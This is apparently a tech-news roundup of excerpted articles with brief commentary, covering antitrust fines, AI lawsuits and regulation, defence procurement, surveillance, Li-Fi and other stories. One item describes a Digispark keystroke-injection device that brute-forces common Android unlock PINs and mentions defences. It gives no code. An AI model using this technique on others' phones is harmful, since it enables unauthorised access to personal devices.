Spain’s antitrust watchdog on Tuesday said it had imposed fines worth a total 194.1 million euros ($218.03 million) on Amazon (AMZN.O) and Apple (AAPL.O) for colluding to limit the online sale of devices from Apple and competitors in Spain.
The two contracts the companies signed on Oct. 31, 2018 granting Amazon the status of authorized Apple dealer included anti-competitive clauses that affected the online market for electronic devices in Spain, CNMC, as the watchdog is known, said in a statement.
Apple was fined 143.6 million euros and Amazon 50.5 million euros. The two companies have two months to appeal the decision.
[…]
“The two companies restricted without justification the number of sellers of Apple products on the Amazon website in Spain,” CNMC said.
More than 90% of the existing retailers who were using Amazon’s market place to sell Apple devices were blocked as a result, it added.
Amazon also reduced the capacity of retailers in the European Union based outside Spain to access Spanish customers, and restricted the advertising Apple’s competitors were allowed to place on its website when users searched for Apple products, the regulator said.
Following the deal between the two tech giants, the prices of Apple devices sold online rose in Spain, it added.
Taco Bell succeeded in its petition to remove the “Taco Tuesday” trademark held by Taco John’s, claiming it held an unfair monopoly over the phrase. Taco John’s CEO Jim Creel backed down from the fight on Tuesday, saying it isn’t worth the legal fees to retain the regional chain’s trademark.
“We’ve always prided ourselves on being the home of Taco Tuesday, but paying millions of dollars to lawyers to defend our mark just doesn’t feel like the right thing to do,” Taco John’s CEO Jim Creel said in a statement to CNN.
Taco John’s adopted the “Taco Tuesday” slogan back in the early 1980s as a two-for-one deal, labeling the promotion as “Taco Twosday” in an effort to ramp up sales. The company trademarked the term in 1989 and owned the right to the phrase in all states with the exception of New Jersey where Gregory’s Restaurant & Tavern beat out Taco John’s by trademarking the term in 1982.
Three decades later, Taco John’s finally received pushback when Taco Bell filed a petition with the U.S. Patent and Trademark Office in May to cancel the trademark, saying any restaurant should be able to use “Taco Tuesday.”
If you think about it, the ability to copyright 2 common words following each other doesn’t make sense at all really. In any 2 word combination, there must have been prior common use.
The United Kingdom’s deal to buy three, rather than the previously planned five Boeing E-7A Wedgetail airborne early warning and control (AEW&C) aircraft for the Royal Air Force “represents extremely poor value for money” and “an absolute folly.” Those are among the conclusions of a report published today by the U.K. Defense Committee, a body that examines Ministry of Defense (MoD) expenditure, administration, and policy on behalf of the British parliament.
A computer-generated rendering of an E-7A Wedgetail in RAF service. Crown Copyright
At the center of the report’s criticism of the procurement is the fact that, as a result of a contract stipulation, the MoD is having to pay for all five Northrop Grumman Multi-role Electronically Scanned Array (MESA) radars, even though only three aircraft — which will be designated Wedgetail AEW1 in RAF service — are being acquired. The report assesses that the total cost of the three-aircraft order will be $2.5 billion, compared to the $2.7 billion agreed for five of the radar planes.
“Even basic arithmetic would suggest that ordering three E-7s rather than five (at some 90 [percent] of the original acquisition cost) represents extremely poor value for money,” the report contends.
The E-7 procurement is one of three major defense deals dealt with by the report, which comes at the end of a six-month inquiry. The Type 26 anti-submarine warfare frigate for the Royal Navy and the Ajax armored fighting vehicle for the British Army also come in for criticism. Worryingly, the overall conclusion is that the U.K.’s defense procurement system is “broken” and that “multiple, successive reviews have not yet fixed it.”
[…]
The report suggests that the tiny fleet will be a “prize target” for aggressors. Not only will the AEW&C aircraft play a critical role in any high-end air campaign, but also planes of this type are increasingly under threat from long-range air defenses and are far from survivable in any kind of contested airspace.
The same report also warns that the initial operating capability for the RAF E-7s could be delayed by a further year to 2025. This is especially concerning considering that the RAF retired its previous E-3D Sentry AEW1 radar planes in 2021, leaving a massive capability gap.
[…]
Other problems are dogging the U.K.’s plans to field the E-7, the report explains, including the failure of Boeing and the British procurement arm, Defense Equipment and Support (DE&S), to agree on an in-service support contract. The report says that such a contract “should already have been successfully finalized long ago.”
So procurement can’t argue that although the savings in initial procurement are minimal, the savings on the through life costs will be huge – because it has no idea what the through life costs of the platform are!
Stability AI, the startup behind the image-generating model Stable Diffusion, is launching a new service that turns sketches into images.
The sketch-to-image service, Stable Doodle, leverages the latest Stable Diffusion model to analyze the outline of a sketch and generate a “visually pleasing” artistic rendition of it. It’s available starting today through ClipDrop, a platform Stability acquired in March through its purchase of Init ML, an AI startup founded by ex-Googlers,
[…]
Under the hood, powering Stable Doodle is a Stable Diffusion model — Stable Diffusion XL — paired with a “conditional control solution” developed by one of Tencent’s R&D divisions, the Applied Research Center (ARC). Called T2I-Adapter, the control solution both allows Stable Diffusion XL to accept sketches as input and guides the model to enable better fine-tuning of the output artwork.
a film made of a compound derived from limonene, the main component of citrus fruit peel, and chitosan, a biopolymer derived from the chitin present in exoskeletons of crustaceans.
The film was developed by a research group in São Paulo state, Brazil, comprising scientists in the Department of Materials Engineering and Bioprocesses at the State University of Campinas’s School of Chemical Engineering (FEQ-UNICAMP) and the Packaging Technology Center at the Institute of Food Technology (ITAL) of the São Paulo State Department of Agriculture and Supply, also in Campinas.
The results of the research are reported in an article published in Food Packaging and Shelf Life.
[…]
Limonene has been used before in film for food packaging to enhance conservation thanks to its antioxidant and anti-microbial action, but its performance is impaired by volatility and instability during the packaging manufacturing process, even on a laboratory scale.
[…]
“The films with the poly(limonene) additive outperformed those with limonene, especially in terms of antioxidant activity, which was about twice as potent,” Vieira said. The substance also performed satisfactorily as an ultraviolet radiation blocker and was found to be non-volatile, making it suitable for large-scale production of packaging, where processing conditions are more severe.
The films are not yet available for use by manufacturers, mainly because chitosan-based plastic is not yet produced on a sufficiently large scale to be competitive, but also because the poly(limonene) production process needs to be optimized to improve yield and to be tested during the manufacturing of commercial packaging.
[…]
More information: Sayeny de Ávila Gonçalves et al, Poly(limonene): A novel renewable oligomeric antioxidant and UV-light blocking additive for chitosan-based films, Food Packaging and Shelf Life (2023). DOI: 10.1016/j.fpsl.2023.101085
Police in New York recently managed to identify and apprehend a drug trafficker seemingly by magic. The perp in question, David Zayas, was traveling through the small upstate town of Scarsdale when he was pulled over by Westchester County police. When cops searched Zayas’ vehicle they found a large amount of crack cocaine, a gun, and over $34,000 in cash in his vehicle. The arrestee later pleaded guilty to a drug trafficking charge.
How exactly did cops know Zayas fit the bill for drug trafficking?
Forbes reports that authorities used the services of a company called Rekor to analyze traffic patterns regionally and, in the course of that analysis, the program identified Zayas as suspicious.
For years, cops have used license plate reading systems to look out for drivers who might have an expired license or are wanted for prior violations. Now, however, AI integrations seem to be making the tech frighteningly good at identifying other kinds of criminality just by observing driver behavior.
Rekor describes itself as an AI-driven “roadway intelligence” platform and it contracts with police departments and other public agencies all across the country. It also works with private businesses. Using Rekor’s software, New York cops were able to sift through a gigantic database of information culled from regional roadways by its county-wide ALPR [automatic license plate recognition] system. That system—which Forbes says is made up of 480 cameras distributed throughout the region—routinely scans 16 million vehicles a week, capturing identifying data points like a vehicle’s license plate number, make, and model. By recording and reverse-engineering vehicle trajectories as they travel across the state, cops can apparently use software to assess whether particular routes are suspicious or not.
In this case, Rekor helped police to assess the route that Zayas’ car was taking on a multi-year basis. The algorithm—which found that the driver was routinely making trips back and forth between Massachusetts and certain areas of upstate New York—determined that Zayas’ routes were “known to be used by narcotics pushers and [involved]…conspicuously short stays,” Forbes writes. As a result, the program deemed Zayas’s activity consistent with that of a drug trafficker.
Artificial intelligence has been getting a lot of attention in recent months due to the disruptions it’s made to the media and software industries but less attention has been paid to how this new technology will inevitably supercharge existing surveillance systems. If cops can already ID a drug trafficker with the click of a button, just think how good this tech will be in ten years’ time. As regulations evolve, one would hope governments will figure out how to reasonably deploy this technology without leading us right off the cliff into Minority Report territory. I mean, they probably won’t, but a guy can dream, can’t he?
Chinese authorities published the nation’s rules governing generative AI on Thursday, including protections that aren’t in place elsewhere in the world.
Some of the rules require operators of generative AI to ensure their services “adhere to the core values of socialism” and don’t produce output that includes “incitement to subvert state power.” AIs are also required to avoid inciting secession, undermining national unity and social stability, or promoting terrorism.
Generative AI services behind the Great Firewall are also not to promote prohibited content that provokes ethnic hatred and discrimination, violence, obscenity, or “false and harmful information.” Those content-related rules don’t deviate from an April 2023 draft.
But deeper in, there’s a hint that China fancies digital public goods for generative AI. The doc calls for promotion of public training data resource platforms and collaborative sharing of model-making hardware to improve its utilization rates.
Authorities also want “orderly opening of public data classification, and [to] expand high-quality public training data resources.”
Another requirement is for AI to be developed with known secure tools: the doc calls for chips, software, tools, computing power and data resources to be proven quantities.
AI operators must also respect the intellectual property rights of data used in models, secure consent of individuals before including personal information, and work to “improve the quality of training data, and enhance the authenticity, accuracy, objectivity, and diversity of training data.”
As developers create algorithms, they’re required to ensure they don’t discriminate based on ethnicity, belief, country, region, gender, age, occupation, or health.
Operators are also required to secure licenses for their Ais under most circumstances.
AI deployed outside China has already run afoul of some of Beijing’s requirements. Just last week OpenAI was sued by novelists and comedians for training on their works without permission. Facial recognition tools used by the UK’s Metropolitan Police have displayed bias.
Hardly a week passes without one of China’s tech giants unveiling further AI services. Last week Alibaba announced a text-to-image service, and Huawei discussed a third-gen weather prediction AI.
The new rules come into force on August 15. Chinese orgs tempted to cut corners and/or flout the rules have the very recent example of Beijing’s massive fines imposed on Ant Group and Tencent as a reminder that straying from the rules will lead to pain – and possibly years of punishment.
You may have seen some headlines recently about some authors filing lawsuits against OpenAI. The lawsuits (plural, though I’m confused why it’s separate attempts at filing a class action lawsuit, rather than a single one) began last week, when authors Paul Tremblay and Mona Awad sued OpenAI and various subsidiaries, claiming copyright infringement in how OpenAI trained its models. They got a lot more attention over the weekend when another class action lawsuit was filed against OpenAI with comedian Sarah Silverman as the lead plaintiff, along with Christopher Golden and Richard Kadrey. The same day the same three plaintiffs (though with Kadrey now listed as the top plaintiff) also sued Meta, though the complaint is basically the same.
All three cases were filed by Joseph Saveri, a plaintiffs class action lawyer who specializes in antitrust litigation. As with all too many class action lawyers, the goal is generally enriching the class action lawyers, rather than actually stopping any actual wrong. Saveri is not a copyright expert, and the lawsuits… show that. There are a ton of assumptions about how Saveri seems to think copyright law works, which is entirely inconsistent with how it actually works.
The complaints are basically all the same, and what it comes down to is the argument that AI systems were trained on copyright-covered material (duh) and that somehow violates their copyrights.
Much of the material in OpenAI’s training datasets, however, comes from copyrighted works—including books written by Plaintiffs—that were copied by OpenAI without consent, without credit, and without compensation
But… this is both wrong and not quite how copyright law works. Training an LLM does not require “copying” the work in question, but rather reading it. To some extent, this lawsuit is basically arguing that merely reading a copyright-covered work is, itself, copyright infringement.
Under this definition, all search engines would be copyright infringing, because effectively they’re doing the same thing: scanning web pages and learning from what they find to build an index. But we’ve already had courts say that’s not even remotely true. If the courts have decided that search engines scanning content on the web to build an index is clearly transformative fair use, so to would be scanning internet content for training an LLM. Arguably the latter case is way more transformative.
And this is the way it should be, because otherwise, it would basically be saying that anyone reading a work by someone else, and then being inspired to create something new would be infringing on the works they were inspired by. I recognize that the Blurred Lines case sorta went in the opposite direction when it came to music, but more recent decisions have really chipped away at Blurred Lines, and even the recording industry (the recording industry!) is arguing that the Blurred Lines case extended copyright too far.
But, if you look at the details of these lawsuits, they’re not arguing any actual copying (which, you know, is kind of important for their to be copyright infringement), but just that the LLMs have learned from the works of the authors who are suing. The evidence there is, well… extraordinarily weak.
For example, in the Tremblay case, they asked ChatGPT to “summarize” his book “The Cabin at the End of the World,” and ChatGPT does so. They do the same in the Silverman case, with her book “The Bedwetter.” If those are infringing, so is every book report by every schoolchild ever. That’s just not how copyright law works.
The lawsuit tries one other tactic here to argue infringement, beyond just “the LLMs read our books.” It also claims that the corpus of data used to train the LLMs was itself infringing.
For instance, in its June 2018 paper introducing GPT-1 (called “Improving Language Understanding by Generative Pre-Training”), OpenAI revealed that it trained GPT-1 on BookCorpus, a collection of “over 7,000 unique unpublished books from a variety of genres including Adventure, Fantasy, and Romance.” OpenAI confirmed why a dataset of books was so valuable: “Crucially, it contains long stretches of contiguous text, which allows the generative model to learn to condition on long-range information.” Hundreds of large language models have been trained on BookCorpus, including those made by OpenAI, Google, Amazon, and others.
BookCorpus, however, is a controversial dataset. It was assembled in 2015 by a team of AI researchers for the purpose of training language models. They copied the books from a website called Smashwords that hosts self-published novels, that are available to readers at no cost. Those novels, however, are largely under copyright. They were copied into the BookCorpus dataset without consent, credit, or compensation to the authors.
If that’s the case, then they could make the argument that BookCorpus itself is infringing on copyright (though, again, I’d argue there’s a very strong fair use claim under the Perfect 10 cases), but that’s separate from the question of whether or not training on that data is infringing.
And that’s also true of the other claims of secret pirated copies of books that the complaint insists OpenAI must have relied on:
As noted in Paragraph 32, supra, the OpenAI Books2 dataset can be estimated to contain about 294,000 titles. The only “internet-based books corpora” that have ever offered that much material are notorious “shadow library” websites like Library Genesis (aka LibGen), Z-Library (aka Bok), Sci-Hub, and Bibliotik. The books aggregated by these websites have also been available in bulk via torrent systems. These flagrantly illegal shadow libraries have long been of interest to the AI-training community: for instance, an AI training dataset published in December 2020 by EleutherAI called “Books3” includes a recreation of the Bibliotik collection and contains nearly 200,000 books. On information and belief, the OpenAI Books2 dataset includes books copied from these “shadow libraries,” because those are the most sources of trainable books most similar in nature and size to OpenAI’s description of Books2.
Again, think of the implications if this is copyright infringement. If a musician were inspired to create music in a certain genre after hearing pirated songs in that genre, would that make the songs they created infringing? No one thinks that makes sense except the most extreme copyright maximalists. But that’s not how the law actually works.
This entire line of cases is just based on a total and complete misunderstanding of copyright law. I completely understand that many creative folks are worried and scared about AI, and in particular that it was trained on their works, and can often (if imperfectly) create works inspired by them. But… that’s also how human creativity works.
Humans read, listen, watch, learn from, and are inspired by those who came before them. And then they synthesize that with other things, and create new works, often seeking to emulate the styles of those they learned from. AI systems and LLMs are doing the same thing. It’s not infringing to learn from and be inspired by the works of others. It’s not infringing to write a book report style summary of the works of others.
I understand the emotional appeal of these kinds of lawsuits, but the legal reality is that these cases seem doomed to fail, and possibly in a way that will leave the plaintiffs having to pay legal fees (since in copyright legal fee awards are much more common).
That said, if we’ve learned anything at all in the past two plus decades of lawsuits about copyright and the internet, courts will sometimes bend over backwards to rewrite copyright law to pretend it says what they want it to say, rather than what it does say. If that happens here, however, it would be a huge loss to human creativity.
Mobile PINs are a lot like passwords in that there are a number of very common ones, and [Mobile Hacker] has a clever proof of concept that uses a tiny microcontroller development board to emulate a keyboard to test the 20 most common unlock PINs on an Android device.
Trying the twenty most common PINs doesn’t take long.
The project is based on research analyzing the security of 4- and 6-digit smartphone PINs which found some striking similarities between user-chosen unlock codes. While the research is a few years old, user behavior in terms of PIN choice has probably not changed much.
The hardware is not much more than a Digispark board, a small ATtiny85-based board with built-in USB connector, and an adapter. In fact, it has a lot in common with the DIY Rubber Ducky except for being focused on doing a single job.
Once connected to a mobile device, it performs a form of keystroke injection attack, automatically sending keyboard events to input the most common PINs with a delay between each attempt. Assuming the device accepts, trying all twenty codes takes about six minutes.
Disabling OTG connections for a device is one way to prevent this kind of attack, and not configuring a common PIN like ‘1111’ or ‘1234’ is even better. You can see the brute forcing in action in the video, embedded below.
Bruteforcing PIN protection of popular app using $3 ATTINY85 #Arduino
Testing all possible PIN combinations (10,000) would take less than 1,5 hours without getting account locked. It is possible coz, PIN is limited only to 4 digits, without biometrics authentication#rubberduckypic.twitter.com/rbu9Tk3S9d
Today, the Institute of Electrical and Electronics Engineers (IEEE) has added 802.11bb as a standard for light-based wireless communications. The publishing of the standard has been welcomed by global Li-Fi businesses, as it will help speed the rollout and adoption of the data-transmission technology standard.
Advantages of using light rather than radio frequencies (RF) are highlighted by Li-Fi proponents including pureLiFi, Fraunhofer HHI, and the Light Communications 802.11bb Task Group. Li-Fi is said to deliver “faster, more reliable wireless communications with unparalleled security compared to conventional technologies such as Wi-Fi and 5G.” Now that the IEEE 802.11bb Li-Fi standard has been released, it is hoped that interoperability between Li-Fi systems with the successful Wi-Fi will be fully addressed.
[…]
Where Li-Fi shines (pun intended) is not just in its purported speeds as fast as 224 GB/s. Fraunhofer’s Dominic Schulz points out that as it works in an exclusive optical spectrum, this ensures higher reliability and lower latency and jitter. Moreover “Light’s line-of-sight propagation enhances security by preventing wall penetration, reducing jamming and eavesdropping risks, and enabling centimetre-precision indoor navigation,” says Shultz.
[…]
One of the big wheels of Li-Fi, pureLiFi, has already prepared the Light Antenna ONE module for integration into connected devices.
[…] an app is required to use many of the smart features of its bikes – and that app relies on communication with VanMoof servers. If the company goes under, and the servers go offline, that could leave ebike owners unable to even unlock their bikes
[…]
While unlocking is activated by Bluetooth when your phone comes into range of the bike, it relies on a rolling key code – and that function in turn relies on access to a VanMoof server. If the company goes bust, then no server, no key code generation, no unlock.
Rival ebike company Cowboy has a solution
A rival ebike company, Belgian company Cowboy, has stepped in to offer a solution. TNW reports that it has created an app which allows VanMoof owners to generate and save their own digital key, which can be used in place of one created by a VanMoof server.
If you have a VanMoof bike, grab the app now, as it requires an initial connection to the VanMoof server to fetch your current keycode. If the server goes offline, existing Bikey App users can continue to unlock their bikes, but it will no longer be possible for new users to activate it.
[…]
In some cases, a companion app may work perfectly well in standalone mode, but it’s surprising how often a server connection is required to access the full feature set.
[…]
Perhaps we need standards here. For example, requiring all functionality (bar firmware updates) to work without access to an external server.
Where this isn’t technically possible, perhaps there should be a legal requirement for essential software to be automatically open-sourced in the event of bankruptcy, so that there would be the option of techier owners banding together to host and maintain the server-side code?
Yup, there are too many examples of good hardware being turned into junk because the OEM goes bankrupt or just decides to stop supporting it. Something needs to be done about this.
Tens of thousands of fraudsters splurged on Lamborghinis, vacation homes, private jet flights and Cartier jewelry by fleecing the PPP loan system in a $200 billion heist — and did it because the COVID loan scheme was so easy to milk.
Approximately $1.2 trillion was rushed through Congress in 2020 and 2021 in COVID bailout cash for businesses and spent on the Economic Injury Disaster Loan Program (EIDLP) and the Paycheck Protection Program (PPP) schemes.
And the SBA says it estimates there are more than 90,000 “actionable leads,” while it has already prosecuted dozens — including a former New York Jets wide receiver, Josh Bellamy.
The spending spree on taxpayer dollars includes Donald Finley, owner of the now-shuttered Manhattan theme restaurant Jekyll & Hyde, who purchased a Nantucket home across from Dionis Beach with waterfront views with millions of dollars from PPP and EIDLP.
Finley faces up to 30 years in prison, and paying more than $3.2 million in restitution, plus a $1.25 million fine.
And experts say crooks created fake businesses or lied about their numbers of employees to get access to more free cash — because it was so simple to fleece the taxpayer.
“The fraud was so easy to commit. All of the information was self-reported and none of it was verified or checked,” Haywood Talcove of LexisNexis Risk Solutions told The Post.
“During the height of the pandemic, it was really hard to purchase [luxury] items like a Rolls-Royce, or a high-end Mercedes because you had people walking in with cash from the PPP program to purchase those items for whatever the dealer was asking,” Talcove said.
Justice might finally be catching up with some of the fraudsters: A total of 803 arrests have taken place as of May 2023 for pandemic fraud, the SBA said.
In a statement about the strike, the Alliance of Motion Picture and Television Producers (AMPTP) said that its proposal included “a groundbreaking AI proposal that protects actors’ digital likenesses for SAG-AFTRA members.”
“If you think that’s a groundbreaking proposal, I suggest you think again.”
When asked about the proposal during the press conference, Crabtree-Ireland said that “This ‘groundbreaking’ AI proposal that they gave us yesterday, they proposed that our background performers should be able to be scanned, get one day’s pay, and their companies should own that scan, their image, their likeness and should be able to use it for the rest of eternity on any project they want, with no consent and no compensation. So if you think that’s a groundbreaking proposal, I suggest you think again.”
In response, AMPTP spokesperson Scott Rowe sent out a statement denying the claims made during SAG-AFTRA’s press conference. “The claim made today by SAG-AFTRA leadership that the digital replicas of background actors may be used in perpetuity with no consent or compensation is false. In fact, the current AMPTP proposal only permits a company to use the digital replica of a background actor in the motion picture for which the background actor is employed. Any other use requires the background actor’s consent and bargaining for the use, subject to a minimum payment.”
The use of generative AI has been one of the major sticking points in negotiations between the two sides (it’s also a major issue behind the writers strike), and in her opening statement of the press conference, SAG-AFTRA president Fran Drescher said that “If we don’t stand tall right now, we are all going to be in trouble, we are all going to be in jeopardy of being replaced by machines.”
After nearly a decade in development, Ellie Weinstein’s Cocoa Press chocolate 3D printer kit is expected to start shipping before the end of the year. Derived from the Voron 0.1 design, the kit is meant to help those with existing 3D printing experience expand their repertoire beyond plastics and into something a bit sweeter.
So who better to host our recent 3D Printing Food Hack Chat? Ellie took the time to answer questions not just about the Cocoa Press itself, but the wider world of printing edible materials. While primarily designed for printing chocolate, with some tweaks, the hardware is capable of extruding other substances such as icing or peanut butter. It’s just a matter of getting the printers in the hands of hackers and makers, and seeing what they’ve got an appetite for.
So, why chocolate? It’s a pretty straightforward question to start the chat on, but Ellie’s answer might come as a surprise. It wasn’t due to some love of chocolate or desire to print custom sweets, at least, not entirely. She simply thought it would be an easy material to work with when she started tinkering with the initial versions of her printer back in 2014. The rationale was that it didn’t take much energy to melt, and that it would return to a solid on its own at room temperature. While true, this temperature sensitivity ended up being exactly why it was such a challenge to work with.
It didn’t take long for the downsides of a generative AI-empowered newsroom to make themselves obvious, between CNet’s secret chatbot reviews editor last November and Buzzfeed’s subsequent mass layoffs of human staff in favor of AI-generated “content” creators. The specter of being replaced by a “good enough AI” looms large in many a journalist’s mind these days with as many as a third of the nation’s newsrooms expected to shutter by the middle of the decade.
But AI doesn’t have to necessarily be an existential threat to the field. As six research teams showed at NYU Media Lab’s AI & Local News Initiative demo day in late June, the technology may also be the key to foundationally transforming the way local news is gathered and produced.
Now in its second year, the initiative is tasked with helping local news organizations to “harness the power of artificial intelligence to drive success.” It’s backed as part of a larger $3 million grant from the Knight Foundation which is funding four such programs in total in partnership with the Associated Press, Brown Institute’s Local News Lab, NYC Media Lab and the Partnership on AI.
This year’s cohort included a mix of teams from academia and private industry, coming together over the course of the 12-week development course to build “AI applications for local news to empower journalists, support the sustainability of news organizations and provide quality information for local news audiences,” NYU Tandon’s news service reported.
“There’s value in being able to bring together people who are working on these problems from a lot of different angles,” Matt Macvey, Community and Project Lead for the initiative, told Engadget, “and that that’s what we’ve tried to facilitate.”
“It also creates an opportunity because … if these news organizations that are out there doing good work are able to keep communicating their value and maintain trust with their readers,” he continued. “I think we could get an information ecosystem where a trusted news source becomes even more valued when it becomes easier [for anyone] to make low-quality [AI generated] content.”
[…]
“Bangla AI will search for information relevant to the people of the Bengali community that has been published in mainstream media … then it will translate for them. So when journalists use Bangla AI, they will see the information in Bengali rather than in English.” The system will also generate summaries of mainstream media posts both in English and Bengali, freeing up local journalists to cover more important news than rewriting wire copy.
Similarly, the team from Chequeado, a non-profit organization fighting disinformation in the public discourse showed off the latest developments of its Chequeabot platform, Monitorio. It leverages AI and natural language processing capabilities to streamline fact-checking efforts in Spanish-language media. Its dashboard continually monitors social media in search of trending misinformation and alerts fact checkers so they can blunt the piece’s virality.
“One of the greatest promises of things like this and Bangla AI,” Chequeado team member Marcos Barroso said during the demo, “is the ability for this kind of technology to go to an under-resourced newsroom and improve their capacity, and allow them to be more efficient.”
The Newsroom AI team from Cornell University hope that their writing assistant platform will help do for journalists what Copilot did for coders – eliminate drudge work. Newsroom can automate a number of common tasks including transcription and information organization, image and headline generation, and SEO implementation. The system will reportedly even write articles in a journalist’s personal style if fed enough training examples.
On the audio side, New York public radio WNYC’s team spent its time developing and prototyping a speech-to-text model that will generate real-time captioning and transcription for its live broadcasts. WNYC is the largest public media station in New York, reaching 2 million visitors monthly through its news website.
“Our live broadcast doesn’t have a meaningful entry point right now for deaf or hard of hearing audiences,” WNYC team member, Sam Guzik, said during the demo. “So, we really want to think about as we’re looking to the future is, ‘how can we make our audio more accessible to those folks who can’t hear?’”
Utilizing AI to perform the speech-to-text transformation alleviates one of the biggest sticking points of modern closed-captioning: that it’s expensive and resource-intensive to turn around quickly when you have humans do it. “Speech-to-text models are relatively low cost,” Guzik continued. “They can operate at scale and they support an API driven architecture that would tie into our experiences.”
The result is a proof-of-concept audio player for the WNYC website that generates accurate closed captioning of whatever clip is currently being played. The system can go a step further by summarizing the contents of that clip in a few bullet points, simply by clicking a button on the audio player.
[…]
the Graham Media Group created an automated natural language text prompter to nudge the comments sections of local news articles closer towards civility.
“The comment-bot posts the first comment on stories to guide conversations and hopefully grow participation and drive users deeper into our engagement funnels,” GMG team member Dustin Block said during the demo. This solves two significant challenges that human comment moderation faces: preventing the loudest voices from dominating the discussion and providing form and structure to the conversation, he explained.
”The bot scans and understands news articles using the GPT 3.5 Turbo API. It generates thought-provoking starters and then it encourages discussions,” he continued. “It’s crafted to be friendly.”
Whether the AI revolution remains friendly to the journalists it’s presumably augmenting remains to be seen, though Macvey isn’t worried. “Most news organizations, especially local news organizations, are so tight on resources and staff that there’s more happening out there than they can cover,” he said. “So I think tools like AI and [the automations seen during the demo day] enable the journalists and editorial staff more bandwidth.”
The reason I cite Gizmodo here is because their AI / ML reporting is always on the negative, doom and gloom side. AI offers opportunities and it’s not going away.
Nearly three years after a 2020 court decision threatened to grind transatlantic e-commerce to a halt, the European Union has adopted a plan that will allow US tech giants to continue storing data about European users on American soil. In a decision announced Monday, the European Commission approved the Trans-Atlantic Data Privacy Framework. Under the terms of the deal, the US will establish a court Europeans can engage with if they feel a US tech platform violated their data privacy rights. President Joe Biden announced the creation of the Data Protection Review Court in an executive order he signed last fall. The court can order the deletion of user data and impose other remedial measures. The framework also limits access to European user data by US intelligence agencies.
The Trans-Atlantic Data Privacy Framework is the latest chapter in a saga that is now more than a decade in the making. It was only earlier this year the EU fined Meta a record-breaking €1.2 billion after it found that Facebook’s practice of moving EU user data to US servers violated the bloc’s digital privacy laws. The EU also ordered Meta to delete the data it already had stored on its US servers if the company didn’t have a legal way to keep that information there by the fall. As TheWall Street Journal notes, Monday’s agreement should allow Meta to avoid the need to delete any data, but the company may end up still paying the fine.
Even with a new agreement in place, it probably won’t be smooth sailing just yet for the companies that depend the most on cross-border data flows. Max Schrems, the lawyer who successfully challenged the previous Safe Harbor and Privacy Shield agreements that governed transatlantic data transfers before today, told The Journal he plans to challenge the new framework. “We would need changes in US surveillance law to make this work and we simply don’t have it,” he said. For what it’s worth, the European Commission says it’s confident it can defend its new framework in court.
The first Rolls-Royce EV, the Spectre, is going on sale soon at a cool $425,000 — and at that price, purchasing slots will be limited, to say the least. But any buyers planning to flip one for a quick profit may want to think twice. CEO Torsten Müller-Ötvös said that any customers attempting to resell their Spectre models for profit will be banned for life from ever buying another Rolls-Royce from official dealers, according to a report from Car Dealer.
“I can tell you we are really sanitizing the need to prove who you are, what you want to do with the car – you need to qualify for a car and then you might get a slot for an order,” he said. And anyone who violates the policy and sells the Spectre for a profit is “going immediately on a blacklist and this is it – you will never ever have the chance to acquire again.”
The British, BMW-owned company isn’t the first to impose bans on flipping its vehicles. Last year, GM said it would ban buyers from flipping Hummer EVs, Corvette Z06’s and other vehicles within 12 months under the threat of limiting the transferability of certain warranties. On top of that stick, it offered a carrot in the form of $5,000 in reward points for customers who kept their eighth-generation Corvette Z06’s for at least a year.
Soon the Deputy Editor of Gizmodo’s science fiction section io9 was flagging 18 “concerns, corrections and comments” about an AI-generated story by “Gizmodo Bot” on the chronological order of Star Wars movies and TV shows. “I have never had to deal with this basic level of incompetence with any of the colleagues that I have ever worked with,” James Whitbrook told the Post in an interview. “If these AI [chatbots] can’t even do something as basic as put a Star Wars movie in order one after the other, I don’t think you can trust it to [report] any kind of accurate information.” The irony that the turmoil was happening at Gizmodo, a publication dedicated to covering technology, was undeniable… Merrill Brown, the editorial director of G/O Media, wrote that because G/O Media owns several sites that cover technology, it has a responsibility to “do all we can to develop AI initiatives relatively early in the evolution of the technology.” “These features aren’t replacing work currently being done by writers and editors,” Brown said in announcing to staffers that the company would roll out a trial to test “our editorial and technological thinking about use of AI.”
“There will be errors, and they’ll be corrected as swiftly as possible,” he promised… In a Slack message reviewed by The Post, Brown told disgruntled employees Thursday that the company is “eager to thoughtfully gather and act on feedback…” The note drew 16 thumbs down emoji, 11 wastebasket emoji, six clown emoji, two face palm emoji and two poop emoji, according to screenshots of the Slack conversation…
Earlier this week, Lea Goldman, the deputy editorial director at G/O Media, notified employees on Slack that the company had “commenced limited testing” of AI-generated stories on four of its sites, including A.V. Club, Deadspin, Gizmodo and The Takeout, according to messages The Post viewed… Employees quickly messaged back with concern and skepticism. “None of our job descriptions include editing or reviewing AI-produced content,” one employee said. “If you wanted an article on the order of the Star Wars movies you … could’ve just asked,” said another. “AI is a solution looking for a problem,” a worker said. “We have talented writers who know what we’re doing. So effectively all you’re doing is wasting everyone’s time.”
The Post spotted four AI-generated stories on the company’s sites, including io9, Deadspin, and its food site The Takeout.
If you look at Gizmodo reporting on AI, you see it’s full of doom and gloom – the writers there know what’s coming and allthough they are smart enough to understand what AI is, they can’t fathom the opportunities it brings, unfortunately. The way this article is written gives a clue: an assistant editor didn’t read the published article beforehand (the entitlement shines through, but let’s be clear, this editor has no right to second guess the actual editor), the job descriptions quote (who ever had a complete job description – and the description may have said simply “editing or reviewing” without the AI bit in there – and why should it have an AI bit in there at all?).
f you’ve ever been riding your motorcycle and thought it’d be cool to have a Terminator-like head-up display, giving you vehicle and navigation data, BMW has just the thing for you. They’re called the BMW ConnectedRide Smartglasses—smart sunglasses with a head-up display (HUD) built into the right lens.
For a smart pair of glasses, with a HUD built in, they aren’t too clunky looking. They’re obviously a bit thicker than a normal pair of glasses but they look pretty sleek, all things considered. Admittedly, they don’t have a camera built in, like Google Glass, and they only need to house a small lithium-ion battery pack and a tiny HUD projector.
The display is pretty small but it’s surprisingly comprehensive. Its shows outside temperature, speed, speed limit, gear, and turn-by-turn navigation. With the latter, users can choose either a simplified arrow or a detailed navigation screen with street names and exact directions. According to BMW, a full battery charge will last ten hours, which is more than enough for a day’s worth of riding.
BMW says that these glasses can be made to fit a variety of different head and helmet shapes, which is said to make them comfortable enough to wear for a full day. The pair also comes with two different lenses. One of which is 85 percent transparent and is designed to be used with helmets that have tinted sun visors. While the other lens is tinted, turning these into sunglasses. Prescription lenses can be fitted via an optician with an RX adapter.
The Brave browser will take action against websites that snoop on visitors by scanning their open Internet ports or accessing other network resources that can expose personal information.
